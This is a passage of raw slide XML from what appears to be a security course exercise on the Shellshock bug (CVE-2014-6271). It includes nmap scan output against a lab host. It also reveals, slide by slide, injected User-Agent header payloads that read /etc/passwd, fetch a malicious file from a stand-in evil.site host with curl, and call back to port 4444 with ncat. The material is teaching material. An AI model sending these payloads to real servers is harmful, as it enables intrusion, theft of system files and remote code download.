              <a:t>$ nmap -sV -p- --script http-shellshock 172.16.0.2</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PORT   STATE SERVICE REASON</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80/tcp open  http    syn-ack</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http-shellshock:</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VULNERABLE:</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HTTP Shellshock vulnerability</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State: VULNERABLE (Exploitable)</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IDs:  CVE:CVE-2014-6271</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This web application might be affected by the vulnerability known as Shellshock. It seems the server is executing commands injected via malicious HTTP headers.</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|Disclosure date: 2014-09-24</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|References:</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http://www.openwall.com/lists/oss-security/2014/09/24/10</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https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>     http://seclists.org/oss-sec/2014/q3/685</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="152400" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>     http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="8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4" name="Shape 2234"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2235" name="Google Shape;2235;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Researching Shellshock Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2236" name="Google Shape;2236;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Write Shellshock payloads that: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2237" name="Google Shape;2237;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8" name="Google Shape;2238;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39" name="Google Shape;2239;p124"/>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Read /etc/passwd:</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Use curl to download a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> file from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://evil.suite/mal.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>:</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Open an Ncat connection to your port 4444:</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800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Send a reverse shell to your port 4444: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Google Shape;2244;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Researching Shellshock Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2245" name="Google Shape;2245;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Write Shellshock payloads that: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2246" name="Google Shape;2246;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7" name="Google Shape;2247;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48" name="Google Shape;2248;p125"/>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Read /etc/passwd:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>User-Agent: () { :;}; /bin/bash -c 'cat /etc/passwd'</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Use curl to download a malicious file from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://evil.suite/mal.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1300">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sz="1300">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rPr lang="en"/>
              <a:t>Open an Ncat connection to your port 4444:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>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rPr lang="en"/>
              <a:t>Send a reverse shell to your port 4444:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="8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2" name="Shape 2252"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2253" name="Google Shape;2253;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Researching Shellshock Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2254" name="Google Shape;2254;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Write Shellshock payloads that: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2255" name="Google Shape;225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56" name="Google Shape;2256;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57" name="Google Shape;2257;p126"/>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Read /etc/passwd:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>User-Agent: () { :;}; /bin/bash -c 'cat /etc/passwd'</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Use curl to download a malicious file from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://evil.suite/mal.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>User-Agent: () { :;}; /bin/bash -c 'cd /tmp &amp;&amp; curl -0 http://evil.site/mal.php'</a:t>
            </a:r>
            <a:endParaRPr sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Open an Ncat connection to your port 4444:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>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t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Send a reverse shell to your port 4444:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="8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1" name="Shape 2261"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2262" name="Google Shape;2262;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Researching Shellshock Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2263" name="Google Shape;2263;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Write Shellshock payloads that: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2264" name="Google Shape;2264;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65" name="Google Shape;2265;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6" name="Google Shape;2266;p127"/>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Read /etc/passwd:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>User-Agent: () { :;}; /bin/bash -c 'cat /etc/passwd'</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Use curl to download a malicious file from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://evil.suite/mal.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>User-Agent: () { :;}; /bin/bash -c 'cd /tmp &amp;&amp; curl -0 http://evil.site/mal.php'</a:t>
            </a:r>
            <a:endParaRPr sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Open an Ncat connection to your port 4444:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>User-Agent: () { :;}; /bin/bash -c 'ncat 192.168.0.5 4444`</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Send a reverse shell to your port 4444:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="8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0" name="Shape 2270"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2271" name="Google Shape;2271;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Researching Shellshock Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2272" name="Google Shape;2272;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Write Shellshock payloads that: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2273" name="Google Shape;2273;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4" name="Google Shape;2274;p12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5" name="Google Shape;2275;p128"/>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Read /etc/passwd:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>User-Agent: () { :;}; /bin/bash -c 'cat /etc/passwd'</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Use curl to download a malicious file from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://evil.suite/mal.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>User-Agent: () { :;}; /bin/bash -c 'cd /tmp &amp;&amp; curl -0 http://evil.site/mal.php'</a:t>
            </a:r>
            <a:endParaRPr sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Open an Ncat connection to your port 4444:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>User-Agent: () { :;}; /bin/bash -c 'ncat 192.168.0.5 4444`</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Send a reverse shell to your port 4444:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>User-Agent: () { :;}; /bin/bash -c 'ncat 192.168.0.5 4444`</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="8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9" name="Shape 2279"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2280" name="Google Shape;2280;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4" name="Shape 2284"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2285" name="Google Shape;2285;p130"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="273900" y="801350"/>
